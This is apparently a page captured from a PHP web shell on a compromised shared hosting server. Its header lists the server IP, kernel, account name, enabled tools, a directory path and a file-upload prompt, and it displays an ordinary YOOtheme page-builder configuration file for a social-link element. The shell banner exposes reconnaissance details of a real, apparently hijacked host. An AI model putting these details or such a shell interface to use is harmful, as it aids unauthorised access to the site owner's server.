| Server IP : 54.36.91.62 / Your IP : 216.73.217.111 Web Server : Apache System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : coopiak ( 151928) PHP Version : 8.3.23 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/coopiak/amisdesseniors-fr/annonces/templates/yootheme/cache/ |
Upload File : |
<?php // $file = /home/coopiak/votrevilleshopping-fr/annonces/templates/yootheme/packages/builder/elements/social_item/element.json
return [
'@import' => $filter->apply('path', './element.php', $file),
'name' => 'social_item',
'title' => 'Item',
'width' => 500,
'templates' => [
'render' => $filter->apply('path', './templates/template.php', $file),
'content' => $filter->apply('path', './templates/content.php', $file)
],
'fields' => [
'link' => [
'label' => 'Link',
'attrs' => [
'placeholder' => 'https://'
],
'source' => true,
'description' => 'Enter link to your social profile. A corresponding <a href="https://getuikit.com/docs/icon" target="_blank">UIkit brand icon</a> will be displayed automatically, if available. Links to email addresses and phone numbers, like mailto:info@example.com or tel:+491570156, are also supported.'
],
'link_aria_label' => [
'label' => 'Link ARIA Label',
'description' => 'Set a different link ARIA label for this item.',
'source' => true
],
'icon' => [
'label' => 'Icon',
'description' => 'Pick an alternative icon from the icon library.',
'type' => 'icon',
'source' => true,
'enable' => '!image'
],
'image' => [
'label' => 'Image',
'description' => 'Pick an alternative SVG image from the media manager.',
'type' => 'image',
'source' => true,
'enable' => '!icon'
],
'status' => $config->get('builder.statusItem'),
'source' => $config->get('builder.source')
],
'fieldset' => [
'default' => [
'type' => 'tabs',
'fields' => [[
'title' => 'Content',
'fields' => ['link', 'link_aria_label', 'icon', 'image']
], $config->get('builder.advancedItem')]
]
]
];